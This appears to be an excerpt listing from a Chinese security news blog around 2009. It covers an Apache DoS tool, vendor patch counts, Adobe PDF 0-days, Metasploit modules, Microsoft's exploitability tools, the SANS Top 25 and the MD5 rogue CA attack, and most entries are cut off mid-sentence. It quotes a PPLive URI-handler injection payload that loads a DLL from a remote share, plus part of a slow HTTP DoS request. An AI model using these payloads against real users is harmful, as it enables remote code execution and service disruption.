SANS昨天报道了一个新的Apache D.o.S工具：http://isc.sans.org/diary.html?storyid=6601

大致原理是, 攻击者先发送一个包：

GET / HTTP/1.1\r\n
Host: host\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n
Content-Length: 42\r\n

结

Aviv Raff打算7月份搞一个Month of Twitter Bugs

每天公布一个twitter第三方服务的bug。

公布地址：http://twitpwn.com/

昨天Apple, 今天MS和Adobe, 狂放补丁, 加起来离100不远了。

为什么Mozilla,Oracle和Sun今天不发布点呢？这样轻轻松松凑个两三百，让用户爽一把。:)

Apple ：50

Microsoft: 31

Adobe: 13

Apple今天一口气补了四五十个.漏洞。。。。

各位赶紧检查一下自己的safari 0day有没有被patch吧.

http://lists.grok.org.uk/pipermail/full-disclosure/2009-March/068543.html
看上去挺牛,憋了好几年的bug,但是看HD Moore的twitter说没能重现?

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of ver

Metasploit更新了，0day，顶。
这个漏洞一般的web fuzzer应该都能找到吧

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/http/bea_weblogic_jsessionid.rb?rev=6406

iDefense今天发布了5个JAVA JRE漏洞公告

Sun Java Runtine Environment (JRE) Type1 Font Parsing Integer Signedness Vulnerability
Sun Java Web Start (JWS) GIF Decoding Heap Corruption Vulnerability

!exploitable -> bang exploitable ->帮exploitable ->帮助确定是否exploitable

Microsoft !exploitable Crash Analyzer

http://www.microsoft.com/security/msec/default.mspx
http://www.codeplex.com/msecdbg

老外在milw0rm贴了一个pplive的漏洞,不知道是不是0day.
这个漏洞也有点意思,可以通过直接加载远程dll文件来利用.

http://milw0rm.com/exploits/8215
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog

synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3

现在有几个Windows用户不安装adobe产品的? :)

两个adobe产品的最新情况:

1. Acrobat reader, 一个好消息一个坏消息
坏消息: 前几天那个0day, Secunia已经搞出来一个不需要JS的exp，
Secunia managed to create a reliable, fully working exploit which does not use JavaScript.
所以关闭JS木有太大意义了。

据本台JI者村长报道, 根据Shadowserver最新消息,有一个全能无敌PDF0 DAY正在传播, targeted attack.

受影响版本:
"All of our testing was done on Adobe Acrobat Reader 8.1.0, 8.1.1, 8.1.2, 8.1.3 (latest release of 8), and 9.0.0 (latest release of 9). We have not confirmed via testing that the exploit actually works on Adobe Acrobat (no

ISS X-Force根据他们漏洞库中的4万多漏洞的信息, 统计了自古以来,发现漏洞数量最多的10位.

MSRC 10月份开始搞了一个Microsoft Exploitability Index,在每月的安全公告里都有一个index项，包含MS对该漏洞的“可利用性”(Exploitability)的预测。

这种预测的结果一般是三种：

发布鸟。
http://www.sans.org/top25errors/

* CATEGORY: Insecure Interaction Between Components
- CWE-20: Improper Input Validation
- CWE-116: Improper Encoding or Escaping of Output
- CWE-89: Failure to Preserve SQL Query Structure (aka ‘SQL Injection’)
- CWE-79: Failure to Preserve Web Page Structure (aka ‘Cross-site Scripting’)
- CWE-78: Failure to Preserve OS Command Struct

昨天的25C3上炒作的就是这一篇,"Creating a rogue CA certificate"
他们的paper:http://www.win.tue.nl/hashclash/rogue-ca/

目前来看, 就是利用MD5的缺陷,通过集成200台PS3进行hash collision, 制造一个"假的"真证书.
但是正像Errata blog讲的, 很多serial都用的很复杂的值,而不是演讲者示例的那种超简单的6位纯数